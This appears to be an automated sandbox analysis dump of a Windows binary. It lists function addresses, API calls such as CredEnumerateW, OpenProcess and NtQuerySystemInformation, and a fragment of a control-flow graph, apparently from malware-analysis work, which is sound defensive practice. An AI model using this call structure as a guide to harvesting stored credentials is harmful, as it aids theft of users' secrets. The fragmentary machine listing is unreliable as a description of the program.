API calls 40229->40415 40231 43af51 40376 423426 11 API calls 40231->40376 40234 43af7d 40377 423426 11 API calls 40234->40377 40235 43b4f2 40422 43a76c 21 API calls 40235->40422 40236->40235 40421 42bbd5 memcpy memcpy memcpy memset memcpy 40236->40421 40240 43b529 40423 44081d 170 API calls 40240->40423 40241 43af94 40378 423330 11 API calls 40241->40378 40245 43b47e 40249 43b497 40245->40249 40418 42374a memcpy memset memcpy memcpy memcpy 40245->40418 40246 43b544 40250 43b55c 40246->40250 40424 42c02e memset 40246->40424 40247 43b428 40268 43b462 40247->40268 40416 432b60 16 API calls 40247->40416 40248 43afca 40379 423330 11 API calls 40248->40379 40419 4233ae 11 API calls 40249->40419 40425 43a87a 170 API calls 40250->40425 40255 43afdb 40380 4233ae 11 API calls 40255->40380 40257 43b4b1 40420 423399 11 API calls 40257->40420 40259 43b56c 40269 43b58a 40259->40269 40426 423330 11 API calls 40259->40426 40261 43afee 40381 44081d 170 API calls 40261->40381 40263 43b4c1 40429 42db80 170 API calls 40263->40429 40267 43b592 40428 43a82f 16 API calls 40267->40428 40417 423330 11 API calls 40268->40417 40427 440f84 12 API calls 40269->40427 40272 43b5b4 40430 438c4e 170 API calls 40272->40430 40274 43b5cf 40431 42c02e memset 40274->40431 40276 43b005 40276->40171 40279 43b01f 40276->40279 40382 42d836 170 API calls 40276->40382 40277 43b1ef 40392 4233c5 16 API calls 40277->40392 40279->40277 40390 423330 11 API calls 40279->40390 40391 42d71d 170 API calls 40279->40391 40280 43b212 40393 423330 11 API calls 40280->40393 40283 43add4 40283->40226 40432 438f86 16 API calls 40283->40432 40286 43b087 40383 4233ae 11 API calls 40286->40383 40287 43b22a 40394 42ccb5 11 API calls 40287->40394 40290 43b10f 40386 423330 11 API calls 40290->40386 40291 43b23f 40395 4233ae 11 API calls 40291->40395 40293 43b257 40396 4233ae 11 API calls 40293->40396 40297 43b26e 40397 4233ae 11 API calls 40297->40397 40298 43b129 40387 4233ae 11 API calls 40298->40387 40301 43b09a 40301->40290 
40384 42cc15 19 API calls 40301->40384 40385 4233ae 11 API calls 40301->40385 40302 43b282 40398 43a87a 170 API calls 40302->40398 40304 43b13c 40388 440f84 12 API calls 40304->40388 40306 43b29d 40399 423330 11 API calls 40306->40399 40309 43b15f 40389 4233ae 11 API calls 40309->40389 40310 43b2af 40312 43b2b8 40310->40312 40313 43b2ce 40310->40313 40400 4233ae 11 API calls 40312->40400 40401 440f84 12 API calls 40313->40401 40316 43b2c9 40403 4233ae 11 API calls 40316->40403 40317 43b2da 40402 42370b memset memcpy memset 40317->40402 40320 43b2f9 40404 423330 11 API calls 40320->40404 40322 43b30b 40405 423330 11 API calls 40322->40405 40324 43b325 40406 423399 11 API calls 40324->40406 40326 43b332 40407 4233ae 11 API calls 40326->40407 40328 43b354 40408 423399 11 API calls 40328->40408 40330 43b364 40409 43a82f 16 API calls 40330->40409 40332 43b370 40410 42db80 170 API calls 40332->40410 40334 43b380 40411 438c4e 170 API calls 40334->40411 40336 43b39e 40412 423399 11 API calls 40336->40412 40338 43b3ae 40413 43a76c 21 API calls 40338->40413 40340 43b3c3 40414 423399 11 API calls 40340->40414 40342->40163 40343->40166 40344->40164 40346 43a6f5 40345->40346 40347 43a765 40345->40347 40346->40347 40434 42a115 40346->40434 40347->40171 40354 4397fd memset 40347->40354 40351 43a73d 40351->40347 40352 42a115 154 API calls 40351->40352 40352->40347 40353->40173 40354->40180 40355->40171 40356->40195 40357->40184 40358->40188 40359->40185 40360->40189 40361->40193 40362->40197 40363->40199 40364->40203 40365->40210 40366->40208 40367->40214 40368->40283 40369->40206 40370->40212 40371->40217 40372->40218 40373->40218 40374->40227 40375->40231 40376->40234 40377->40241 40378->40248 40379->40255 40380->40261 40381->40276 40382->40286 40383->40301 40384->40301 40385->40301 40386->40298 40387->40304 40388->40309 40389->40279 40390->40279 40391->40279 40392->40280 40393->40287 40394->40291 40395->40293 40396->40297 40397->40302 40398->40306 40399->40310 40400->40316 
40401->40317 40402->40316 40403->40320 40404->40322 40405->40324 40406->40326 40407->40328 40408->40330 40409->40332 40410->40334 40411->40336 40412->40338 40413->40340 40414->40283 40415->40247 40416->40268 40417->40245 40418->40249 40419->40257 40420->40263 40421->40235 40422->40240 40423->40246 40424->40250 40425->40259 40426->40269 40427->40267 40428->40263 40429->40272 40430->40274 40431->40283 40432->40226 40433->40171 40435 42a175 40434->40435 40437 42a122 40434->40437 40435->40347 40440 42b13b 154 API calls 40435->40440 40437->40435 40438 42a115 154 API calls 40437->40438 40441 43a174 40437->40441 40465 42a0a8 154 API calls 40437->40465 40438->40437 40440->40351 40455 43a196 40441->40455 40456 43a19e 40441->40456 40442 43a306 40442->40455 40478 4388c4 14 API calls 40442->40478 40445 42a115 154 API calls 40445->40456 40446 415a91 memset 40446->40456 40447 43a642 40447->40455 40482 4169a7 11 API calls 40447->40482 40449 4165ff 11 API calls 40449->40456 40451 43a635 40481 42c02e memset 40451->40481 40455->40437 40456->40442 40456->40445 40456->40446 40456->40449 40456->40455 40466 42ff8c 40456->40466 40474 439504 13 API calls 40456->40474 40475 4312d0 154 API calls 40456->40475 40476 42be4c memcpy memcpy memcpy memset memcpy 40456->40476 40477 43a121 11 API calls 40456->40477 40458 4169a7 11 API calls 40459 43a325 40458->40459 40459->40447 40459->40451 40459->40455 40459->40458 40460 42b5b5 memset memcpy 40459->40460 40461 42bf4c 14 API calls 40459->40461 40464 4165ff 11 API calls 40459->40464 40479 42b63e 14 API calls 40459->40479 40480 42bfcf memcpy 40459->40480 40460->40459 40461->40459 40464->40459 40465->40437 40467 43817e 146 API calls 40466->40467 40468 42ff99 40467->40468 40469 42ffe3 40468->40469 40470 42ffd0 40468->40470 40473 42ff9d 40468->40473 40484 4169a7 11 API calls 40469->40484 40483 4169a7 11 API calls 40470->40483 40473->40456 40474->40456 40475->40456 40476->40456 40477->40456 40478->40459 40479->40459 40480->40459 40481->40447 40482->40455 
40483->40473 40484->40473 37685 41276d 37686 41277d 37685->37686 37728 4044a4 LoadLibraryW 37686->37728 37688 412785 37720 412789 37688->37720 37736 414b81 37688->37736 37691 4127c8 37742 412465 memset ??2@YAPAXI 37691->37742 37693 4127ea 37754 40ac21 37693->37754 37698 412813 37772 40dd07 memset 37698->37772 37699 412827 37777 40db69 memset 37699->37777 37702 412822 37798 4125b6 ??3@YAXPAX 37702->37798 37704 40ada2 _wcsicmp 37705 41283d 37704->37705 37705->37702 37708 412863 CoInitialize 37705->37708 37782 41268e 37705->37782 37802 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37708->37802 37712 41296f 37804 40b633 37712->37804 37714 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37719 412957 CoUninitialize 37714->37719 37725 4128ca 37714->37725 37719->37702 37721 4128d0 TranslateAcceleratorW 37722 412941 GetMessageW 37721->37722 37721->37725 37722->37719 37722->37721 37723 412909 IsDialogMessageW 37723->37722 37723->37725 37724 4128fd IsDialogMessageW 37724->37722 37724->37723 37725->37721 37725->37723 37725->37724 37726 41292b TranslateMessage DispatchMessageW 37725->37726 37727 41291f IsDialogMessageW 37725->37727 37726->37722 37727->37722 37727->37726 37729 4044f7 37728->37729 37730 4044cf GetProcAddress 37728->37730 37734 404507 MessageBoxW 37729->37734 37735 40451e 37729->37735 37731 4044e8 FreeLibrary 37730->37731 37732 4044df 37730->37732 37731->37729 37733 4044f3 37731->37733 37732->37731 37733->37729 37734->37688 37735->37688 37737 414b8a 37736->37737 37738 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37736->37738 37808 40a804 memset 37737->37808 37738->37691 37741 414b9e GetProcAddress 37741->37738 37743 4124e0 37742->37743 37744 412505 ??2@YAPAXI 37743->37744 37745 41251c 37744->37745 37747 412521 37744->37747 37830 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37745->37830 37819 444722 37747->37819 37753 41259b wcscpy 37753->37693 37835 40b1ab free free 37754->37835 37756 
40ad76 37836 40aa04 37756->37836 37759 40a9ce malloc memcpy free free 37762 40ac5c 37759->37762 37760 40ad4b 37760->37756 37859 40a9ce 37760->37859 37762->37756 37762->37759 37762->37760 37763 40ace7 free 37762->37763 37839 40a8d0 37762->37839 37851 4099f4 37762->37851 37763->37762 37767 40a8d0 7 API calls 37767->37756 37768 40ada2 37769 40adc9 37768->37769 37770 40adaa 37768->37770 37769->37698 37769->37699 37770->37769 37771 40adb3 _wcsicmp 37770->37771 37771->37769 37771->37770 37864 40dce0 37772->37864 37774 40dd3a GetModuleHandleW 37869 40dba7 37774->37869 37778 40dce0 3 API calls 37777->37778 37779 40db99 37778->37779 37941 40dae1 37779->37941 37955 402f3a 37782->37955 37784 412766 37784->37702 37784->37708 37785 4126d3 _wcsicmp 37786 4126a8 37785->37786 37786->37784 37786->37785 37788 41270a 37786->37788 37989 4125f8 7 API calls 37786->37989 37788->37784 37958 411ac5 37788->37958 37799 4125da 37798->37799 37800 4125f0 37799->37800 37801 4125e6 DeleteObject 37799->37801 37803 40b1ab free free 37800->37803 37801->37800 37802->37714 37803->37712 37805 40b640 37804->37805 37806 40b639 free 37804->37806 37807 40b1ab free free 37805->37807 37806->37805 37807->37720 37809 40a83b GetSystemDirectoryW 37808->37809 37810 40a84c wcscpy 37808->37810 37809->37810 37815 409719 wcslen 37810->37815 37813 40a881 LoadLibraryW 37814 40a886 37813->37814 37814->37738 37814->37741 37816 409724 37815->37816 37817 409739 wcscat LoadLibraryW 37815->37817 37816->37817 37818 40972c wcscat 37816->37818 37817->37813 37817->37814 37818->37817 37820 444732 37819->37820 37821 444728 DeleteObject 37819->37821 37831 409cc3 37820->37831 37821->37820 37823 412551 37824 4010f9 37823->37824 37825 401130 37824->37825 37826 401134 GetModuleHandleW LoadIconW 37825->37826 37827 401107 wcsncat 37825->37827 37828 40a7be 37826->37828 37827->37825 37829 40a7d2 37828->37829 37829->37753 37829->37829 37830->37747 37834 409bfd memset wcscpy 37831->37834 37833 409cdb CreateFontIndirectW 37833->37823 
37834->37833 37835->37762 37837 40aa14 37836->37837 37838 40aa0a free 37836->37838 37837->37768 37838->37837 37840 40a8eb 37839->37840 37841 40a8df wcslen 37839->37841 37842 40a906 free 37840->37842 37843 40a90f 37840->37843 37841->37840 37844 40a919 37842->37844 37845 4099f4 3 API calls 37843->37845 37846 40a932 37844->37846 37847 40a929 free 37844->37847 37845->37844 37849 4099f4 3 API calls 37846->37849 37848 40a93e memcpy 37847->37848 37848->37762 37850 40a93d 37849->37850 37850->37848 37852 409a41 37851->37852 37853 4099fb malloc 37851->37853 37852->37762 37855 409a37 37853->37855 37856 409a1c 37853->37856 37855->37762 37857 409a30 free 37856->37857 37858 409a20 memcpy 37856->37858 37857->37855 37858->37857 37860 40a9e7 37859->37860 37861 40a9dc free 37859->37861 37863 4099f4 3 API calls 37860->37863 37862 40a9f2 37861->37862 37862->37767 37863->37862 37888 409bca GetModuleFileNameW 37864->37888 37866 40dce6 wcsrchr 37867 40dcf5 37866->37867 37868 40dcf9 wcscat 37866->37868 37867->37868 37868->37774 37889 44db70 37869->37889 37873 40dbfd 37892 4447d9 37873->37892 37876 40dc34 wcscpy wcscpy 37918 40d6f5 37876->37918 37877 40dc1f wcscpy 37877->37876 37880 40d6f5 3 API calls 37881 40dc73 37880->37881 37882 40d6f5 3 API calls 37881->37882 37883 40dc89 37882->37883 37884 40d6f5 3 API calls 37883->37884 37885 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37884->37885 37924 40da80 37885->37924 37888->37866 37890 40dbb4 memset memset 37889->37890 37891 409bca GetModuleFileNameW 37890->37891 37891->37873 37894 4447f4 37892->37894 37893 40dc1b 37893->37876 37893->37877 37894->37893 37895 444807 ??2@YAPAXI 37894->37895 37896 44481f 37895->37896 37897 444873 _snwprintf 37896->37897 37898 4448ab wcscpy 37896->37898 37931 44474a 8 API calls 37897->37931 37900 4448bb 37898->37900 37932 44474a 8 API calls 37900->37932 37901 4448a7 37901->37898 37901->37900 37903 4448cd 37933 44474a 8 API calls 37903->37933 37905 4448e2 37934 44474a 8 API calls 37905->37934 37907 4448f7 
37935 44474a 8 API calls 37907->37935 37909 44490c 37936 44474a 8 API calls 37909->37936 37911 444921 37937 44474a 8 API calls 37911->37937 37913 444936 37938 44474a 8 API calls 37913->37938 37915 44494b 37939 44474a 8 API calls 37915->37939 37917 444960 ??3@YAXPAX 37917->37893 37919 44db70 37918->37919 37920 40d702 memset GetPrivateProfileStringW 37919->37920 37921 40d752 37920->37921 37922 40d75c WritePrivateProfileStringW 37920->37922 37921->37922 37923 40d758 37921->37923 37922->37923 37923->37880 37925 44db70 37924->37925 37926 40da8d memset 37925->37926 37927 40daac LoadStringW 37926->37927 37928 40dac6 37927->37928 37928->37927 37930 40dade 37928->37930 37940 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37928->37940 37930->37702 37931->37901 37932->37903 37933->37905 37934->37907 37935->37909 37936->37911 37937->37913 37938->37915 37939->37917 37940->37928 37951 409b98 GetFileAttributesW 37941->37951 37943 40daea 37944 40db63 37943->37944 37945 40daef wcscpy wcscpy GetPrivateProfileIntW 37943->37945 37944->37704 37952 40d65d GetPrivateProfileStringW 37945->37952 37947 40db3e 37953 40d65d GetPrivateProfileStringW 37947->37953 37949 40db4f 37954 40d65d GetPrivateProfileStringW 37949->37954 37951->37943 37952->37947 37953->37949 37954->37944 37990 40eaff 37955->37990 37959 411ae2 memset 37958->37959 37960 411b8f 37958->37960 38030 409bca GetModuleFileNameW 37959->38030 37972 411a8b 37960->37972 37962 411b0a wcsrchr 37963 411b22 wcscat 37962->37963 37964 411b1f 37962->37964 38031 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37963->38031 37964->37963 37966 411b67 38032 402afb 37966->38032 37970 411b7f 38088 40ea13 SendMessageW memset SendMessageW 37970->38088 37973 402afb 27 API calls 37972->37973 37974 411ac0 37973->37974 37975 4110dc 37974->37975 37976 41113e 37975->37976 37981 4110f0 37975->37981 38113 40969c LoadCursorW SetCursor 37976->38113 37978 411143 38114 444a54 37978->38114 38117 4032b4 37978->38117 37979 4110f7 
_wcsicmp 37979->37981 37980 411157 37982 40ada2 _wcsicmp 37980->37982 37981->37976 37981->37979 38135 410c46 10 API calls 37981->38135 37985 411167 37982->37985 37983 4111af 37985->37983 37986 4111a6 qsort 37985->37986 37986->37983 37989->37786 37991 40eb10 37990->37991 38003 40e8e0 37991->38003 37994 40eb6c memcpy memcpy 38000 40ebb7 37994->38000 37995 40d134 16 API calls 37995->38000 37996 40ebf2 ??2@YAPAXI ??2@YAPAXI 37997 40ec2e ??2@YAPAXI 37996->37997 38001 40ec65 37996->38001 37997->38001 38000->37994 38000->37995 38000->37996 38001->38001 38013 40ea7f 38001->38013 38002 402f49 38002->37786 38004 40e8f2 38003->38004 38005 40e8eb ??3@YAXPAX 38003->38005 38006 40e900 38004->38006 38007 40e8f9 ??3@YAXPAX 38004->38007 38005->38004 38008 40e911 38006->38008 38009 40e90a ??3@YAXPAX 38006->38009 38007->38006 38010 40e931 ??2@YAPAXI ??2@YAPAXI 38008->38010 38011 40e921 ??3@YAXPAX 38008->38011 38012 40e92a ??3@YAXPAX 38008->38012 38009->38008 38010->37994 38011->38012 38012->38010 38014 40aa04 free 38013->38014 38015 40ea88 38014->38015 38016 40aa04 free 38015->38016 38017 40ea90 38016->38017 38018 40aa04 free 38017->38018 38019 40ea98 38018->38019 38020 40aa04 free 38019->38020 38021 40eaa0 38020->38021 38022 40a9ce 4 API calls 38021->38022 38023 40eab3 38022->38023 38024 40a9ce 4 API calls 38023->38024 38025 40eabd 38024->38025 38026 40a9ce 4 API calls 38025->38026 38027 40eac7 38026->38027 38028 40a9ce 4 API calls 38027->38028 38029 40ead1 38028->38029 38029->38002 38030->37962 38031->37966 38089 40b2cc 38032->38089 38034 402b0a 38035 40b2cc 27 API calls 38034->38035 38036 402b23 38035->38036 38037 40b2cc 27 API calls 38036->38037 38038 402b3a 38037->38038 38039 40b2cc 27 API calls 38038->38039 38040 402b54 38039->38040 38041 40b2cc 27 API calls 38040->38041 38042 402b6b 38041->38042 38043 40b2cc 27 API calls 38042->38043 38044 402b82 38043->38044 38045 40b2cc 27 API calls 38044->38045 38046 402b99 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402bb0 
38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402bc7 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402bde 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402bf5 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402c0c 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402c23 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402c3a 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402c51 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402c68 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402c7f 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402c99 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402cb3 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402cd5 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402cf0 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402d0b 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402d26 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402d3e 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402d59 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402d78 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402d93 38085->38086 38087 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38086->38087 38087->37970 38088->37960 38092 40b58d 38089->38092 38091 40b2d1 38091->38034 38093 40b5a4 GetModuleHandleW FindResourceW 38092->38093 38094 40b62e 38092->38094 38095 40b5c2 LoadResource 38093->38095 38097 40b5e7 38093->38097 38094->38091 38096 40b5d0 SizeofResource LockResource 38095->38096 38095->38097 38096->38097 38097->38094 38105 40afcf 38097->38105 38099 40b608 memcpy 38108 40b4d3 memcpy 38099->38108 38101 40b61e 38109 40b3c1 18 API calls 38101->38109 38103 40b626 38110 40b04b 38103->38110 38106 40b04b ??3@YAXPAX 38105->38106 38107 40afd7 ??2@YAPAXI 38106->38107 38107->38099 38108->38101 38109->38103 38111 40b051 ??3@YAXPAX 
38110->38111 38112 40b05f 38110->38112 38111->38112 38112->38094 38113->37978 38115 444a64 FreeLibrary 38114->38115 38116 444a83 38114->38116 38115->38116 38116->37980 38118 4032c4 38117->38118 38119 40b633 free 38118->38119 38120 403316 38119->38120 38136 44553b 38120->38136 38124 403480 38334 40368c 15 API calls 38124->38334 38126 403489 38127 40b633 free 38126->38127 38128 403495 38127->38128 38128->37980 38129 4033a9 memset memcpy 38130 4033ec wcscmp 38129->38130 38131 40333c 38129->38131 38130->38131 38131->38124 38131->38129 38131->38130 38332 4028e7 11 API calls 38131->38332 38333 40f508 6 API calls 38131->38333 38133 403421 _wcsicmp 38133->38131 38135->37981 38137 445548 38136->38137 38138 445599 38137->38138 38335 40c768 38137->38335 38139 4455a8 memset 38138->38139 38151 4457f2 38138->38151 38418 403988 38139->38418 38146 4458aa 38148 44594a 38146->38148 38149 4458bb memset memset 38146->38149 38147 445672 38429 403fbe memset memset memset memset memset 38147->38429 38153 4459ed 38148->38153 38154 44595e memset memset 38148->38154 38156 414c2e 17 API calls 38149->38156 38158 445854 38151->38158 38520 403e2d memset memset memset memset memset 38151->38520 38161 445a00 memset memset 38153->38161 38162 445b22 38153->38162 38163 414c2e 17 API calls 38154->38163 38155 4455e5 38155->38147 38166 44560f 38155->38166 38164 4458f9 38156->38164 38157 44557a 38159 44558c 38157->38159 38616 4136c0 CoTaskMemFree 38157->38616 38158->38146 38543 403c9c memset memset memset memset memset 38158->38543 38402 444b06 38159->38402 38566 414c2e 38161->38566 38169 445bca 38162->38169 38170 445b38 memset memset memset 38162->38170 38174 44599c 38163->38174 38165 40b2cc 27 API calls 38164->38165 38175 445909 38165->38175 38177 4087b3 344 API calls 38166->38177 38168 445849 38632 40b1ab free free 38168->38632 38176 445c8b memset memset 38169->38176 38233 445cf0 38169->38233 38180 445bd4 38170->38180 38181 445b98 38170->38181 38184 40b2cc 27 API calls 38174->38184 38193 409d1f 6 API 
calls 38175->38193 38185 414c2e 17 API calls 38176->38185 38194 445621 38177->38194 38178 445585 38617 41366b FreeLibrary 38178->38617 38179 44589f 38633 40b1ab free free 38179->38633 38191 414c2e 17 API calls 38180->38191 38181->38180 38187 445ba2 38181->38187 38196 4459ac 38184->38196 38197 445cc9 38185->38197 38705 4099c6 wcslen 38187->38705 38188 4456b2 38620 40b1ab free free 38188->38620 38190 40b2cc 27 API calls 38200 445a4f 38190->38200 38202 445be2 38191->38202 38192 403335 38331 4452e5 45 API calls 38192->38331 38205 445919 38193->38205 38618 4454bf 20 API calls 38194->38618 38195 445823 38195->38168 38214 4087b3 344 API calls 38195->38214 38206 409d1f 6 API calls 38196->38206 38208 409d1f 6 API calls 38197->38208 38198 445879 38198->38179 38218 4087b3 344 API calls 38198->38218 38582 409d1f wcslen wcslen 38200->38582 38212 40b2cc 27 API calls 38202->38212 38203 445d3d 38231 40b2cc 27 API calls 38203->38231 38204 445d88 memset memset memset 38215 414c2e 17 API calls 38204->38215 38634 409b98 GetFileAttributesW 38205->38634 38207 4459bc 38206->38207 38701 409b98 GetFileAttributesW 38207->38701 38217 445ce1 38208->38217 38209 445bb3 38708 445403 memset 38209->38708 38210 445680 38210->38188 38452 4087b3 memset 38210->38452 38221 445bf3 38212->38221 38214->38195 38224 445dde 38215->38224 38725 409b98 GetFileAttributesW 38217->38725 38218->38198 38230 409d1f 6 API calls 38221->38230 38222 445928 38222->38148 38635 40b6ef 38222->38635 38232 40b2cc 27 API calls 38224->38232 38225 4459cb 38225->38153 38242 40b6ef 259 API calls 38225->38242 38229 40b2cc 27 API calls 38235 445a94 38229->38235 38237 445c07 38230->38237 38238 445d54 _wcsicmp 38231->38238 38241 445def 38232->38241 38233->38192 38233->38203 38233->38204 38234 445389 265 API calls 38234->38169 38587 40ae18 38235->38587 38236 44566d 38236->38151 38503 413d4c 38236->38503 38245 445389 265 API calls 38237->38245 38246 445d71 38238->38246 38308 445d67 38238->38308 38240 445665 38619 40b1ab free free 
38240->38619 38247 409d1f 6 API calls 38241->38247 38242->38153 38250 445c17 38245->38250 38726 445093 23 API calls 38246->38726 38253 445e03 38247->38253 38249 4456d8 38255 40b2cc 27 API calls 38249->38255 38256 40b2cc 27 API calls 38250->38256 38252 44563c 38252->38240 38258 4087b3 344 API calls 38252->38258 38727 409b98 GetFileAttributesW 38253->38727 38254 40b6ef 259 API calls 38254->38192 38261 4456e2 38255->38261 38262 445c23 38256->38262 38257 445d83 38257->38192 38258->38252 38260 445e12 38266 445e6b 38260->38266 38270 40b2cc 27 API calls 38260->38270 38621 413fa6 _wcsicmp _wcsicmp 38261->38621 38265 409d1f 6 API calls 38262->38265 38268 445c37 38265->38268 38729 445093 23 API calls 38266->38729 38267 4456eb 38273 4456fd memset memset memset memset 38267->38273 38274 4457ea 38267->38274 38275 445389 265 API calls 38268->38275 38269 445b17 38702 40aebe 38269->38702 38277 445e33 38270->38277 38622 409c70 wcscpy wcsrchr 38273->38622 38625 413d29 38274->38625 38281 445c47 38275->38281 38282 409d1f 6 API calls 38277->38282 38279 445e7e 38283 445f67 38279->38283 38286 40b2cc 27 API calls 38281->38286 38287 445e47 38282->38287 38288 40b2cc 27 API calls 38283->38288 38284 445ab2 memset 38289 40b2cc 27 API calls 38284->38289 38291 445c53 38286->38291 38728 409b98 GetFileAttributesW 38287->38728 38293 445f73 38288->38293 38294 445aa1 38289->38294 38290 409c70 2 API calls 38295 44577e 38290->38295 38296 409d1f 6 API calls 38291->38296 38298 409d1f 6 API calls 38293->38298 38294->38269 38294->38284 38299 409d1f 6 API calls 38294->38299 38594 40add4 38294->38594 38599 445389 38294->38599 38608 40ae51 38294->38608 38300 409c70 2 API calls 38295->38300 38301 445c67 38296->38301 38297 445e56 38297->38266 38305 445e83 memset 38297->38305 38302 445f87 38298->38302 38299->38294 38303 44578d 38300->38303 38304 445389 265 API calls 38301->38304 38732 409b98 GetFileAttributesW 38302->38732 38303->38274 38310 40b2cc 27 API calls 38303->38310 38304->38169 38309 40b2cc 27 API calls 
38305->38309 38308->38192 38308->38254 38312 445eab 38309->38312 38311 4457a8 38310->38311 38313 409d1f 6 API calls 38311->38313 38314 409d1f 6 API calls 38312->38314 38315 4457b8 38313->38315 38316 445ebf 38314->38316 38624 409b98 GetFileAttributesW 38315->38624 38318 40ae18 9 API calls 38316->38318 38327 445ef5 38318->38327 38319 4457c7 38319->38274 38321 4087b3 344 API calls 38319->38321 38320 40ae51 9 API calls 38320->38327 38321->38274 38322 445f5c 38323 40aebe FindClose 38322->38323 38323->38283 38324 40add4 2 API calls 38324->38327 38325 40b2cc 27 API calls 38325->38327 38326 409d1f 6 API calls 38326->38327 38327->38320 38327->38322 38327->38324 38327->38325 38327->38326 38329 445f3a 38327->38329 38730 409b98 GetFileAttributesW 38327->38730 38731 445093 23 API calls 38329->38731 38331->38131 38332->38133 38333->38131 38334->38126 38336 40c775 38335->38336 38733 40b1ab free free 38336->38733 38338 40c788 38734 40b1ab free free 38338->38734 38340 40c790 38735 40b1ab free free 38340->38735 38342 40c798 38343 40aa04 free 38342->38343 38344 40c7a0 38343->38344 38736 40c274 memset 38344->38736 38349 40a8ab 9 API calls 38350 40c7c3 38349->38350 38351 40a8ab 9 API calls 38350->38351 38352 40c7d0 38351->38352 38765 40c3c3 38352->38765 38356 40c877 38365 40bdb0 38356->38365 38357 40c86c 38807 4053fe 39 API calls 38357->38807 38363 40c7e5 38363->38356 38363->38357 38364 40c634 50 API calls 38363->38364 38790 40a706 38363->38790 38364->38363 39070 404363 38365->39070 38367 40bf5d 39090 40440c 38367->39090 38370 40bdee 38370->38367 38373 40b2cc 27 API calls 38370->38373 38371 40bddf CredEnumerateW 38371->38370 38374 40be02 wcslen 38373->38374 38374->38367 38382 40be1e 38374->38382 38375 40be26 wcsncmp 38375->38382 38378 40be7d memset 38379 40bea7 memcpy 38378->38379 38378->38382 38380 40bf11 wcschr 38379->38380 38379->38382 38380->38382 38381 40b2cc 27 API calls 38383 40bef6 _wcsnicmp 38381->38383 38382->38367 38382->38375 38382->38378 38382->38379 38382->38380 
38382->38381 38384 40bf43 LocalFree 38382->38384 39093 40bd5d 28 API calls 38382->39093 39094 404423 38382->39094 38383->38380 38383->38382 38384->38382 38385 4135f7 39109 4135e0 38385->39109 38388 40b2cc 27 API calls 38389 41360d 38388->38389 38390 40a804 8 API calls 38389->38390 38391 413613 38390->38391 38392 41361b 38391->38392 38393 41363e 38391->38393 38394 40b273 27 API calls 38392->38394 38395 4135e0 FreeLibrary 38393->38395 38396 413625 GetProcAddress 38394->38396 38397 413643 38395->38397 38396->38393 38398 413648 38396->38398 38397->38157 38399 413658 38398->38399 38400 4135e0 FreeLibrary 38398->38400 38399->38157 38401 413666 38400->38401 38401->38157 39112 4449b9 38402->39112 38405 444c1f 38405->38138 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39133 444972 GetVersionExW 38408->39133 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 38416->38411 38416->38412 39134 444aa5 42 API calls 38416->39134 39135 40a7a0 GetVersionExW 38416->39135 39136 444a85 42 API calls 38416->39136 38419 40399d 38418->38419 39138 403a16 38419->39138 38422 403a12 wcsrchr 38422->38155 38425 4039a3 38426 4039f4 38425->38426 38428 403a09 38425->38428 39149 40a02c CreateFileW 38425->39149 38427 4099c6 2 API calls 38426->38427 38426->38428 38427->38428 39152 40b1ab free free 38428->39152 38430 414c2e 17 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 17 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39179 40414f memset 38443->39179 38445 404140 39193 40b1ab free free 38445->39193 38447 4040ec memset 38450 4040e0 38447->38450 38448 404148 38448->38210 38449 

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 